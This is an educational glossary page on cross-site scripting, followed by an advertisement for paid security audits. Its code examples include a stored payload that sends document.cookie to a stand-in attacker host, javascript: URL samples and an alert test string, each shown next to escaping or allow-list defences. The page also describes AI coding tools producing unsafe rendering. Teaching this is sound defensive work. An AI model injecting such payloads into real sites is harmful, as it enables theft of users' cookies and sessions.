What is Cross-Site Scripting (XSS)?

An attack where malicious code is injected into a website, running in other users' browsers to steal data or hijack sessions.

In plain English

Imagine someone slips a note into a library book that says 'give me your wallet.' Every person who reads that page follows the instruction because they trust the library. XSS works the same way — attackers inject code into a trusted website, and visitors' browsers execute it because they trust the site.

How it works

An attacker finds a place where user input is written back into a page, such as a comment box, search bar, or profile name whose value is inserted into the HTML without being escaped for that context. They submit JavaScript (or HTML that carries it) instead of normal text. When another user views the page, their browser cannot tell the injected markup from the site's own, so it runs the script with that user's session. The script can read cookies that are not marked HttpOnly, make requests to the site as the victim, redirect them to phishing pages, or rewrite the page to capture passwords.
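The rendering mistake described above, as an added example (not code from the original page): a server-side comment renderer that concatenates user text into markup, beside the same renderer with output escaping. The comment store and the attacker's payload are constructed for illustration.

```javascript
// Added example, not from the original page. A minimal comment renderer in
// its vulnerable form and its escaped form.

// Constructed "database" of stored comments. The second entry is an
// attacker's stored-XSS payload that ships the viewer's cookies elsewhere.
const comments = [
  { author: 'alice', body: 'Nice article!' },
  { author: 'mallory', body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
];

// Vulnerable: user text is concatenated straight into HTML, so the browser
// parses the payload as markup and executes it for every viewer.
function renderCommentsUnsafe(list) {
  return list.map(c => `<li><b>${c.author}</b>: ${c.body}</li>`).join('\n');
}

// Escape the five characters that can change the HTML text or attribute context.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: every user-controlled value is escaped on output, so the payload
// is displayed as literal text and is never parsed as a <script> element.
function renderCommentsSafe(list) {
  return list
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('\n');
}

// Crude stand-in for what a browser would do: is there a live script element
// in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(containsScriptTag(renderCommentsUnsafe(comments))); // true
console.log(containsScriptTag(renderCommentsSafe(comments)));   // false
```

The escaping here is for element text and double-quoted attribute values only; a value that lands inside a URL or a JavaScript string needs the encoding rules of that context instead.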

Types of XSS

Stored XSS: the payload is saved on the server (via a comment or profile field, for example) and served to every user who views that content. Reflected XSS: the payload travels in a URL parameter or form field and is echoed straight back in the response, so it only runs when a victim opens a crafted link. DOM-based XSS: the page's own JavaScript reads attacker-controlled data (for example from location.hash or a query string) and writes it into the DOM through a sink such as innerHTML; the payload may never reach the server at all, so server-side filtering cannot catch it.

How to prevent it

Never insert user-provided data directly into HTML; escape it for the context it lands in (element text, attribute value, URL, or JavaScript string). Use your framework's built-in escaping: React does this by default for values rendered through JSX. Where you must render user-supplied HTML, run it through a sanitization library such as DOMPurify first. Set a Content-Security-Policy header that forbids inline scripts and restricts which origins may serve scripts; this limits the damage of an injection you missed, but it is not a substitute for escaping. Never pass unsanitized user content to dangerouslySetInnerHTML or innerHTML.

Why AI-built apps are vulnerable

AI coding tools sometimes render user content with innerHTML, dangerouslySetInnerHTML, or template literals that concatenate it straight into markup, with no escaping or sanitization. They may also strip or loosen Content-Security-Policy headers to get past errors during development, and that change ships to production.

Frequently asked questions

Can React apps get XSS attacks?

React escapes values rendered through JSX by default, which prevents most XSS. You are still exposed if you use dangerouslySetInnerHTML, write to the DOM outside React (innerHTML, document.write, or manually built nodes filled with user data), or set href, src, or similar attributes to a user-provided URL, since a javascript: URL executes when the link is followed.
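The javascript: URL problem mentioned above, as an added example that is not part of the original page: a check that accepts only http, https and mailto link targets before a value is placed in href. The sample inputs are constructed.

```javascript
// Added example, not from the original page. Validates a user-supplied link
// target before it is used as an href value.

// Schemes we are willing to link to. Anything else (javascript:, data:,
// vbscript:) is rejected outright rather than "cleaned up".
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

// Returns a URL string that is safe to put in href, or null if the input
// should be dropped. Parsing with the WHATWG URL class (available in Node
// and browsers) handles the tricks a naive startsWith('javascript:') check
// misses: mixed case, leading whitespace or control characters, and tab or
// newline characters inside the scheme, all of which browsers normalise away
// before deciding how to handle the URL.
function safeHref(input, base = 'https://example.com/') {
  let url;
  try {
    url = new URL(String(input), base);
  } catch (e) {
    return null; // unparseable input: refuse it
  }
  return ALLOWED_PROTOCOLS.has(url.protocol) ? url.href : null;
}

// Constructed inputs: two legitimate links and four attempts to smuggle a
// script-bearing scheme past a string comparison.
const samples = [
  'https://example.org/profile',
  '/relative/path',
  'javascript:alert(document.cookie)',
  '  JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', safeHref(s));
}
```

In a React component the result goes into the attribute as usual (`<a href={safeHref(userUrl) ?? '#'}>`); the point is that the allow-list decision is made on the parsed protocol, not on the raw string.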

How do I test for XSS?

Try entering <script>alert('test')</script> in every input field and URL parameter, then look at where the value lands in the response. Input reflected inside an attribute, a JavaScript string, or a URL needs a different payload (one that first closes the attribute or string it sits in), so the absence of a popup does not prove the field is safe. Use OWASP ZAP (https://www.zaproxy.org/), a free open-source security scanner maintained by the OWASP Foundation, to automate testing. According to the OWASP Top 10, injection flaws remain one of the most critical web security risks. Our security scan checks for XSS vulnerabilities automatically.

Check your app

Get a professional review of your app at a fixed price.

Security Scan

Black-box review of your public-facing app. No code access needed.

$19
  • OWASP Top 10 checks
  • SSL/TLS analysis
  • Security headers
  • Expert review within 24h
Get Started

Code Audit

In-depth review of your source code for security, quality, and best practices.

$19
  • Security vulnerabilities
  • Code quality review
  • Dependency audit
  • AI pattern analysis
Get Started
Best Value

Complete Bundle

Both scans in one package with cross-referenced findings.

$29 (regularly $38)
  • Everything in both products
  • Cross-referenced findings
  • Unified action plan
Get Started

100% credited toward any paid service. Start with an audit, then let us fix what we find.

Worried about cross-site scripting (XSS) in your app?

Get a professional code audit ($19) or book a free call to discuss your concerns.

Tell Us About Your App